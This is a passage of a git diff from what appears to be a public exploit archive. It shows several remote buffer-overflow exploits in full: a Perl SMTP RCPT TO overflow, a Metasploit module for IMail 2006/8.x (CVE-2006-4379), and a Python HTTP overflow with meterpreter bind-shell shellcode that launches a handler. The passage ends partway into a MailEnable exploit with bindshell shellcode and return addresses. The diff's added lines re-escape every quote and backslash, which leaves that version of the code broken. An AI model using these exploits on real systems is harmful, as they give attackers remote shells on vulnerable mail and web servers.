-"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
-"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
-"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
-"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
-"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
+my $shellcode  = \"\\x33\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x93\".
+\"\\x7b\\xbd\\x36\\x83\\xee\\xfc\\xe2\\xf4\\x6f\\x11\\x56\\x7b\\x7b\\x82\\x42\\xc9\".
+\"\\x6c\\x1b\\x36\\x5a\\xb7\\x5f\\x36\\x73\\xaf\\xf0\\xc1\\x33\\xeb\\x7a\\x52\\xbd\".
+\"\\xdc\\x63\\x36\\x69\\xb3\\x7a\\x56\\x7f\\x18\\x4f\\x36\\x37\\x7d\\x4a\\x7d\\xaf\".
+\"\\x3f\\xff\\x7d\\x42\\x94\\xba\\x77\\x3b\\x92\\xb9\\x56\\xc2\\xa8\\x2f\\x99\\x1e\".
+\"\\xe6\\x9e\\x36\\x69\\xb7\\x7a\\x56\\x50\\x18\\x77\\xf6\\xbd\\xcc\\x67\\xbc\\xdd\".
+\"\\x90\\x57\\x36\\xbf\\xff\\x5f\\xa1\\x57\\x50\\x4a\\x66\\x52\\x18\\x38\\x8d\\xbd\".
+\"\\xd3\\x77\\x36\\x46\\x8f\\xd6\\x36\\x76\\x9b\\x25\\xd5\\xb8\\xdd\\x75\\x51\\x66\".
+\"\\x6c\\xad\\xdb\\x65\\xf5\\x13\\x8e\\x04\\xfb\\x0c\\xce\\x04\\xcc\\x2f\\x42\\xe6\".
+\"\\xfb\\xb0\\x50\\xca\\xa8\\x2b\\x42\\xe0\\xcc\\xf2\\x58\\x50\\x12\\x96\\xb5\\x34\".
+\"\\xc6\\x11\\xbf\\xc9\\x43\\x13\\x64\\x3f\\x66\\xd6\\xea\\xc9\\x45\\x28\\xee\\x65\".
+\"\\xc0\\x28\\xfe\\x65\\xd0\\x28\\x42\\xe6\\xf5\\x13\\xac\\x6a\\xf5\\x28\\x34\\xd7\".
+\"\\x06\\x13\\x19\\x2c\\xe3\\xbc\\xea\\xc9\\x45\\x11\\xad\\x67\\xc6\\x84\\x6d\\x5e\".
+\"\\x37\\xd6\\x93\\xdf\\xc4\\x84\\x6b\\x65\\xc6\\x84\\x6d\\x5e\\x76\\x32\\x3b\\x7f\".
+\"\\xc4\\x84\\x6b\\x66\\xc7\\x2f\\xe8\\xc9\\x43\\xe8\\xd5\\xd1\\xea\\xbd\\xc4\\x61\".
+\"\\x6c\\xad\\xe8\\xc9\\x43\\x1d\\xd7\\x52\\xf5\\x13\\xde\\x5b\\x1a\\x9e\\xd7\\x66\".
+\"\\xca\\x52\\x71\\xbf\\x74\\x11\\xf9\\xbf\\x71\\x4a\\x7d\\xc5\\x39\\x85\\xff\\x1b\".
+\"\\x6d\\x39\\x91\\xa5\\x1e\\x01\\x85\\x9d\\x38\\xd0\\xd5\\x44\\x6d\\xc8\\xab\\xc9\".
+\"\\xe6\\x3f\\x42\\xe0\\xc8\\x2c\\xef\\x67\\xc2\\x2a\\xd7\\x37\\xc2\\x2a\\xe8\\x67\".
+\"\\x6c\\xab\\xd5\\x9b\\x4a\\x7e\\x73\\x65\\x6c\\xad\\xd7\\xc9\\x6c\\x4c\\x42\\xe6\".
+\"\\x18\\x2c\\x41\\xb5\\x57\\x1f\\x42\\xe0\\xc1\\x84\\x6d\\x5e\\x63\\xf1\\xb9\\x69\".
+\"\\xc0\\x84\\x6b\\xc9\\x43\\x7b\\xbd\\x36\";
 
 
-my $nop="\x41"x137;
+my $nop=\"\\x41\"x137;
 
-my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";
+my $buffer = \"RCPT TO:\".\"\\x20\\x3c\\x40\".$eip . \"\\x3a\" .$nop.$happystack.$shellcode.\"\\x4a\\x61\\x63\\x3e\".\"\\n\";
 
 
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
+my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$host, PeerPort=>$port);
+$socket or die \"Cannot connect to host!\\n\";
 
 recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
+print \"Response:\" . $reply;
 
 
-$request = "EHLO " . "\r\n";
+$request = \"EHLO \" . \"\\r\\n\";
 send $socket, $request, 0;
-print "[+] Sent  EHLO\n";
+print \"[+] Sent  EHLO\\n\";
 recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
+print \"Response:\" . $reply;
 
 
-$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
+$request = \"MAIL FROM:\" . \"\\x20\" . \"\\x3c\".\"acaro\". \"\\x40\".\"jervus.it\" . \"\\x3e\" . \"\\r\\n\";
 send $socket, $request, 0;
-print "[+] Sent  MAIL FROM\n";
+print \"[+] Sent  MAIL FROM\\n\";
 recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
+print \"Response:\" . $reply;
 
 
 
 
 $request = $buffer;
 send $socket, $request, 0;
-print "[+] Sent malicius request\n";
+print \"[+] Sent malicius request\\n\";
 close $socket;
 
 
 
-print " + connect on port 4444 of $host ...\n";
+print \" + connect on port 4444 of $host ...\\n\";
 sleep(3);
-system("telnet $host 4444");
+system(\"telnet $host 4444\");
 exit;
 
 # milw0rm.com [2007-02-04]
diff --git a/platforms/windows/remote/3265.pm b/platforms/windows/remote/3265.pm
index 73af667cb..53cf3d482 100755
--- a/platforms/windows/remote/3265.pm
+++ b/platforms/windows/remote/3265.pm
@@ -7,127 +7,127 @@
 ##
 
 package Msf::Exploit::imail_smtp_rcpt_overflow;
-use base "Msf::Exploit";
+use base \"Msf::Exploit\";
 use strict;
 use Pex::Text;
 my $advanced = { };
 
 my $info = {
-	'Name'    => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
-	'Version'  => '$Revision: 1.0 $',
-	'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
-	'Arch'    => [ 'x86' ],
-	'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
-	'Priv'    => 1,
+	\'Name\'    => \'IMail 2006 and 8.x SMTP Stack Overflow Exploit\',
+	\'Version\'  => \'$Revision: 1.0 $\',
+	\'Authors\' => [ \'Jacopo Cervini <acaro [at] jervus.it>\', ],
+	\'Arch\'    => [ \'x86\' ],
+	\'OS\'      => [ \'win32\', \'winnt\', \'win2000\', \'winxp\', \'win2003\'],
+	\'Priv\'    => 1,
 
-	'UserOpts'  =>
+	\'UserOpts\'  =>
 	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 25],
-		'Encoder'   => [1, 'EncodedPayload', 'Use Pex!!'],
+		\'RHOST\' => [1, \'ADDR\', \'The target address\'],
+		\'RPORT\' => [1, \'PORT\', \'The target port\', 25],
+		\'Encoder\'   => [1, \'EncodedPayload\', \'Use Pex!!\'],
 
 		
 	  },
 
-	'AutoOpts'  => { 'EXITFUNC'  => 'seh' },
-	'Payload' =>
+	\'AutoOpts\'  => { \'EXITFUNC\'  => \'seh\' },
+	\'Payload\' =>
 	  {
-		'Space'     => 400,
-		'BadChars'  => "\x00\x0d\x0a\x20\x3e\x22\x40",
-		'Keys'      => ['+ws2ord'],
+		\'Space\'     => 400,
+		\'BadChars\'  => \"\\x00\\x0d\\x0a\\x20\\x3e\\x22\\x40\",
+		\'Keys\'      => [\'+ws2ord\'],
 		
 
 	  },
 
-	'Description'  => Pex::Text::Freeform(qq{
+	\'Description\'  => Pex::Text::Freeform(qq{
 This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
-If we send a long strings for RCPT TO command contained within the characters '@' and ':'
+If we send a long strings for RCPT TO command contained within the characters \'@\' and \':\'
 we can overwrite the eip register and exploit the vulnerable smpt service
 }),
 
-	'Refs'  =>
+	\'Refs\'  =>
 	  [
-		['BID', '19885'],
-		['CVE', '2006-4379'],
-		['URL',   'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
+		[\'BID\', \'19885\'],
+		[\'CVE\', \'2006-4379\'],
+		[\'URL\',   \'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html\'],
 	  ],
 
-	'Targets' =>
+	\'Targets\' =>
 	  [
 
-	['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
-	['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12
+	[\'Universal IMail 8.10\',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
+	[\'Universal IMail 8.12\',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12
 
 
 	  ],
 
-	'DefaultTarget' => 0,
+	\'DefaultTarget\' => 0,
 
-	'Keys' => ['smtp'],
+	\'Keys\' => [\'smtp\'],
 
-	'DisclosureDate' => 'September 7 2006',
+	\'DisclosureDate\' => \'September 7 2006\',
   };
 
 sub new {
 	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_);
 
 	return($self);
 }
 
 sub Exploit {
 	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target_host = $self->GetVar(\'RHOST\');
+	my $target_port = $self->GetVar(\'RPORT\');
+	my $target_idx  = $self->GetVar(\'TARGET\');
+	my $shellcode   = $self->GetVar(\'EncodedPayload\')->Payload;
 
 	my $target = $self->Targets->[$target_idx];
 
 
 
-	my $ehlo = "EHLO " . "\r\n";
+	my $ehlo = \"EHLO \" . \"\\r\\n\";
 
-	my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
+	my $mail_from = \"MAIL FROM:\" . \"\\x20\" . \"\\x3c\".\"acaro\". \"\\x40\".\"jervus.it\" . \"\\x3e\" . \"\\r\\n\";
 
 
-	my $pattern = "\x20\x3c\x40";
-	$pattern .= pack('V', $target->[1]);
-	$pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
+	my $pattern = \"\\x20\\x3c\\x40\";
+	$pattern .= pack(\'V\', $target->[1]);
+	$pattern .=\"\\x3a\" . $self->MakeNops((0x1e8-length ($shellcode)));
 	$pattern .= $shellcode;
-	$pattern .= "\x4a\x61\x63\x3e"; 
+	$pattern .= \"\\x4a\\x61\\x63\\x3e\"; 
 
-	my $request = "RCPT TO: " . $pattern ."\n";
+	my $request = \"RCPT TO: \" . $pattern .\"\\n\";
 
-	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using pop eax, ret at 0x%.8x...", $target->[1]));
+	$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using pop eax, ret at 0x%.8x...\", $target->[1]));
 
 	my $s = Msf::Socket::Tcp->new
 	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-		'SSL'       => $self->GetVar('SSL'),
+		\'PeerAddr\'  => $target_host,
+		\'PeerPort\'  => $target_port,
+		\'LocalPort\' => $self->GetVar(\'CPORT\'),
+		\'SSL\'       => $self->GetVar(\'SSL\'),
 	  );
 
 	if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		$self->PrintLine(\'[*] Error creating socket: \' . $s->GetError);
 		return;
 	}
 my $r = $s->Recv(-1, 5);
 
 	$s->Send($ehlo);
-	$self->PrintLine("[*] I'm sending ehlo command");
-	$self->PrintLine("[*] $r");
+	$self->PrintLine(\"[*] I\'m sending ehlo command\");
+	$self->PrintLine(\"[*] $r\");
 	sleep(2);
 		
 	$s->Send($mail_from);
-	$self->PrintLine("[*] I'm sending mail from command");
+	$self->PrintLine(\"[*] I\'m sending mail from command\");
 	$r = $s->Recv(-1, 10);
-	$self->PrintLine("[*] $r");
+	$self->PrintLine(\"[*] $r\");
 	sleep(2);
 
 	$s->Send($request);
-	$self->PrintLine("[*] I'm sending rcpt to command");
+	$self->PrintLine(\"[*] I\'m sending rcpt to command\");
 	sleep(2);
 
 	return;
diff --git a/platforms/windows/remote/33027.py b/platforms/windows/remote/33027.py
index eae5cd697..0e82f63b4 100755
--- a/platforms/windows/remote/33027.py
+++ b/platforms/windows/remote/33027.py
@@ -12,66 +12,66 @@
 import socket, sys, os, time 
 
 if len(sys.argv) != 3:
-	print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
-        print "[*] Exploit created by Polunchis"
-        print "[*] https://www.intrusionlabs.com.mx"
+	print \"[*] Uso: %s <Ip Victima> <Puerto> \\n\" % sys.argv[0]
+        print \"[*] Exploit created by Polunchis\"
+        print \"[*] https://www.intrusionlabs.com.mx\"
 	sys.exit(0)
 host = sys.argv[1]         
 port = int(sys.argv[2])
  
-#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
+#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b \'\\x00\\xff\\x0a\\x0d\\x20\\x40\'
 shellcode = (
-"\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
-"\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86"
-"\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe"
-"\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23"
-"\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23"
-"\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6"
-"\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab"
-"\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab"
-"\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55"
-"\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2"
-"\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8"
-"\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37"
-"\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63"
-"\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6"
-"\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb"
-"\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c"
-"\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08"
-"\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec"
-"\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2"
-"\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc"
-"\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0"
-"\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f"
+\"\\x29\\xc9\\x83\\xe9\\xb5\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\"
+\"\\xaa\\x86\\x33\\x5f\\x83\\xee\\xfc\\xe2\\xf4\\x56\\x6e\\xba\\x5f\\xaa\\x86\"
+\"\\x53\\xd6\\x4f\\xb7\\xe1\\x3b\\x21\\xd4\\x03\\xd4\\xf8\\x8a\\xb8\\x0d\\xbe\"
+\"\\x0d\\x41\\x77\\xa5\\x31\\x79\\x79\\x9b\\x79\\x02\\x9f\\x06\\xba\\x52\\x23\"
+\"\\xa8\\xaa\\x13\\x9e\\x65\\x8b\\x32\\x98\\x48\\x76\\x61\\x08\\x21\\xd4\\x23\"
+\"\\xd4\\xe8\\xba\\x32\\x8f\\x21\\xc6\\x4b\\xda\\x6a\\xf2\\x79\\x5e\\x7a\\xd6\"
+\"\\xb8\\x17\\xb2\\x0d\\x6b\\x7f\\xab\\x55\\xd0\\x63\\xe3\\x0d\\x07\\xd4\\xab\"
+\"\\x50\\x02\\xa0\\x9b\\x46\\x9f\\x9e\\x65\\x8b\\x32\\x98\\x92\\x66\\x46\\xab\"
+\"\\xa9\\xfb\\xcb\\x64\\xd7\\xa2\\x46\\xbd\\xf2\\x0d\\x6b\\x7b\\xab\\x55\\x55\"
+\"\\xd4\\xa6\\xcd\\xb8\\x07\\xb6\\x87\\xe0\\xd4\\xae\\x0d\\x32\\x8f\\x23\\xc2\"
+\"\\x17\\x7b\\xf1\\xdd\\x52\\x06\\xf0\\xd7\\xcc\\xbf\\xf2\\xd9\\x69\\xd4\\xb8\"
+\"\\x6d\\xb5\\x02\\xc2\\xb5\\x01\\x5f\\xaa\\xee\\x44\\x2c\\x98\\xd9\\x67\\x37\"
+\"\\xe6\\xf1\\x15\\x58\\x55\\x53\\x8b\\xcf\\xab\\x86\\x33\\x76\\x6e\\xd2\\x63\"
+\"\\x37\\x83\\x06\\x58\\x5f\\x55\\x53\\x63\\x0f\\xfa\\xd6\\x73\\x0f\\xea\\xd6\"
+\"\\x5b\\xb5\\xa5\\x59\\xd3\\xa0\\x7f\\x11\\x02\\x84\\xf9\\xee\\x31\\x5f\\xbb\"
+\"\\xda\\xba\\xb9\\xc0\\x96\\x65\\x08\\xc2\\x44\\xe8\\x68\\xcd\\x79\\xe6\\x0c\"
+\"\\xfd\\xee\\x84\\xb6\\x92\\x79\\xcc\\x8a\\xf9\\xd5\\x64\\x37\\xde\\x6a\\x08\"
+\"\\xbe\\x55\\x53\\x64\\xc8\\xc2\\xf3\\x5d\\x12\\xcb\\x79\\xe6\\x35\\xaa\\xec\"
+\"\\x37\\x09\\xfd\\xee\\x31\\x86\\x62\\xd9\\xcc\\x8a\\x21\\xb0\\x59\\x1f\\xc2\"
+\"\\x86\\x23\\x5f\\xaa\\xd0\\x59\\x5f\\xc2\\xde\\x97\\x0c\\x4f\\x79\\xe6\\xcc\"
+\"\\xf9\\xec\\x33\\x09\\xf9\\xd1\\x5b\\x5d\\x73\\x4e\\x6c\\xa0\\x7f\\x87\\xf0\"
+\"\\x76\\x6c\\x03\\xc5\\x2a\\x46\\x45\\x33\\x5f\"
 )
 
-nop =  "A" * 33 + '\x90' * 20
-junk = "C" *(515-(len(nop)+len(shellcode)))
-opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
-eip = '\x63\x46\x92\x7c'
+nop =  \"A\" * 33 + \'\\x90\' * 20
+junk = \"C\" *(515-(len(nop)+len(shellcode)))
+opcode= \"\\x83\\xc4\\x44\\x83\\xc4\\x44\\x83\\xc4\\x44\\xff\\xe4\"
+eip = \'\\x63\\x46\\x92\\x7c\'
 #7c86467b 7C924663 call esp
-buffer = nop + shellcode + junk + eip + opcode + "B" * 60 
+buffer = nop + shellcode + junk + eip + opcode + \"B\" * 60 
 
-req = ("GET /" + buffer + " HTTP/1.1\r\n"
-"Host: " + host + ":" + str(port) + "\r\n"
-"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
-"Connection: keep-alive\r\n\r\n")
-print "  [+] Connecting to %s:%d" % (host, port)
+req = (\"GET /\" + buffer + \" HTTP/1.1\\r\\n\"
+\"Host: \" + host + \":\" + str(port) + \"\\r\\n\"
+\"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\\r\\n\"
+\"Connection: keep-alive\\r\\n\\r\\n\")
+print \"  [+] Connecting to %s:%d\" % (host, port)
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 	s.connect((host, port))
-	print "  [+] Sending payload.." + "nop: " + str(len(nop)) + "   junk: " + str(len(junk)) + "   shellcode: " + str(len(shellcode))
+	print \"  [+] Sending payload..\" + \"nop: \" + str(len(nop)) + \"   junk: \" + str(len(junk)) + \"   shellcode: \" + str(len(shellcode))
 	s.send(req)
 	data = s.recv(1024)
-	print "  [+] Closing connection.."
+	print \"  [+] Closing connection..\"
 	s.close()
-	print "[+] Exploit Sent Successfully"
-    	print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
-    	print "\r"
+	print \"[+] Exploit Sent Successfully\"
+    	print \"[+] Waiting for 3 sec before spawning shell to \" + host + \":4444\\r\"
+    	print \"\\r\"
     	time.sleep(3)
-        os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")
-    	print "[-] Connection lost from " + host + ":4444 \r"
+        os.system(\"msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E\")
+    	print \"[-] Connection lost from \" + host + \":4444 \\r\"
 except:
-    	print "[-] Could not connect to " + host + ":4444\r"
+    	print \"[-] Could not connect to \" + host + \":4444\\r\"
         sys.exit(0) 
diff --git a/platforms/windows/remote/3320.pl b/platforms/windows/remote/3320.pl
index 1ae4fe319..12fb5df46 100755
--- a/platforms/windows/remote/3320.pl
+++ b/platforms/windows/remote/3320.pl
@@ -8,47 +8,47 @@
 # - Tested on: Mail Enable Professional v2.35 (win32)
 #
 # Note: timing is quite critical with this!!, so change $send_delay
-#       if it doesn't work....
+#       if it doesn\'t work....
 #
 ########
 
-use Getopt::Std; getopts('t:n:', \%arg);
+use Getopt::Std; getopts(\'t:n:\', \\%arg);
 use Socket;
 
 # metasploit win32 bindshell port 1337
 my $zshell_win32_bind =
-  "\x33\xc9\x83\xe9\xb0".
-  "\x81\xc4\xd0\xfd\xff\xff".
-  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
-  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
-  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
-  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
-  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
-  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
-  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
-  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
-  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
-  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
-  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
-  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
-  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
-  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
-  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
-  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
-  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
-  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
-  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
-  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
-  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
-  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
+  \"\\x33\\xc9\\x83\\xe9\\xb0\".
+  \"\\x81\\xc4\\xd0\\xfd\\xff\\xff\".
+  \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x1d\".
+  \"\\xcc\\x32\\x69\\x83\\xeb\\xfc\\xe2\\xf4\\xe1\\xa6\\xd9\\x24\\xf5\\x35\\xcd\\x96\".
+  \"\\xe2\\xac\\xb9\\x05\\x39\\xe8\\xb9\\x2c\\x21\\x47\\x4e\\x6c\\x65\\xcd\\xdd\\xe2\".
+  \"\\x52\\xd4\\xb9\\x36\\x3d\\xcd\\xd9\\x20\\x96\\xf8\\xb9\\x68\\xf3\\xfd\\xf2\\xf0\".
+  \"\\xb1\\x48\\xf2\\x1d\\x1a\\x0d\\xf8\\x64\\x1c\\x0e\\xd9\\x9d\\x26\\x98\\x16\\x41\".
+  \"\\x68\\x29\\xb9\\x36\\x39\\xcd\\xd9\\x0f\\x96\\xc0\\x79\\xe2\\x42\\xd0\\x33\\x82\".
+  \"\\x1e\\xe0\\xb9\\xe0\\x71\\xe8\\x2e\\x08\\xde\\xfd\\xe9\\x0d\\x96\\x8f\\x02\\xe2\".
+  \"\\x5d\\xc0\\xb9\\x19\\x01\\x61\\xb9\\x29\\x15\\x92\\x5a\\xe7\\x53\\xc2\\xde\\x39\".
+  \"\\xe2\\x1a\\x54\\x3a\\x7b\\xa4\\x01\\x5b\\x75\\xbb\\x41\\x5b\\x42\\x98\\xcd\\xb9\".
+  \"\\x75\\x07\\xdf\\x95\\x26\\x9c\\xcd\\xbf\\x42\\x45\\xd7\\x0f\\x9c\\x21\\x3a\\x6b\".
+  \"\\x48\\xa6\\x30\\x96\\xcd\\xa4\\xeb\\x60\\xe8\\x61\\x65\\x96\\xcb\\x9f\\x61\\x3a\".
+  \"\\x4e\\x9f\\x71\\x3a\\x5e\\x9f\\xcd\\xb9\\x7b\\xa4\\x37\\x50\\x7b\\x9f\\xbb\\x88\".
+  \"\\x88\\xa4\\x96\\x73\\x6d\\x0b\\x65\\x96\\xcb\\xa6\\x22\\x38\\x48\\x33\\xe2\\x01\".
+  \"\\xb9\\x61\\x1c\\x80\\x4a\\x33\\xe4\\x3a\\x48\\x33\\xe2\\x01\\xf8\\x85\\xb4\\x20\".
+  \"\\x4a\\x33\\xe4\\x39\\x49\\x98\\x67\\x96\\xcd\\x5f\\x5a\\x8e\\x64\\x0a\\x4b\\x3e\".
+  \"\\xe2\\x1a\\x67\\x96\\xcd\\xaa\\x58\\x0d\\x7b\\xa4\\x51\\x04\\x94\\x29\\x58\\x39\".
+  \"\\x44\\xe5\\xfe\\xe0\\xfa\\xa6\\x76\\xe0\\xff\\xfd\\xf2\\x9a\\xb7\\x32\\x70\\x44\".
+  \"\\xe3\\x8e\\x1e\\xfa\\x90\\xb6\\x0a\\xc2\\xb6\\x67\\x5a\\x1b\\xe3\\x7f\\x24\\x96\".
+  \"\\x68\\x88\\xcd\\xbf\\x46\\x9b\\x60\\x38\\x4c\\x9d\\x58\\x68\\x4c\\x9d\\x67\\x38\".
+  \"\\xe2\\x1c\\x5a\\xc4\\xc4\\xc9\\xfc\\x3a\\xe2\\x1a\\x58\\x96\\xe2\\xfb\\xcd\\xb9\".
+  \"\\x96\\x9b\\xce\\xea\\xd9\\xa8\\xcd\\xbf\\x4f\\x33\\xe2\\x01\\xf2\\x02\\xd2\\x09\".
+  \"\\x4e\\x33\\xe4\\x96\\xcd\\xcc\\x32\\x69\";
 
 # ff e4 -> jmp %esp
-my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
-                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
-                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
-                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
-                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
-                "\xef\xbe\xad\xde"  # DoS
+my @offsets = ( \"\\xf8\\xfe\\x5a\\x7c\", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
